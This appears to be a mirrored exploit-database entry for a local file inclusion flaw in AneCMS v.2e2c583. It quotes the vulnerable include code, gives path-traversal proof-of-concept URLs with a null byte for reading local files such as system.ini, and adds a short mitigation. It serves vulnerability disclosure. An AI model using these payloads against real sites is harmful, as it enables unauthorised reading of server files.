header-logo
Suggest Exploit
vendor:
AneCMS
by:
I2sec-PJH
8,8
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: AneCMS
Affected Version From: v.2e2c583
Affected Version To: v.2e2c583
Patch Exists: NO
Related CWE: N/A
CPE: a:anegroup:anecms:2e2c583
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

AneCMS v.2e2c583 LFI exploit

Vulnerabilities have been discovered in the index page of AneCMS v.2e2c583. The source code of index.php contains an include statement that allows an attacker to include arbitrary files from the local file system. The proof of concept (PoC) for this exploit is to send a crafted HTTP request with a parameter 'p' containing the path of the file to be included, such as 'http://localhost/acp/index.php?p=../../../../windows/system.ini%00' or 'http://localhost/acp/index.php?p=../../../../[localfile]%00'.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the index page and to validate user input before using it in an include statement.
Source

Exploit-DB raw data:

# Exploit Title: AneCMS v.2e2c583 LFI exploit
# Date: 03.04.2012# Author: I2sec-PJH
# Software Link: https://github.com/AneGroup/AneCMS 
# Version: v.2e2c583 -----------------------------------------------------


-Description
vulnerabilities have been discovered in the index page.
-source of index.php
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
-PoC
http://localhost/acp/index.php?p=../../../../windows/system.ini%00
http://localhost/acp/index.php?p=../../../../[localfile]%00

Navigation

Suggest Exploit

Services By CQR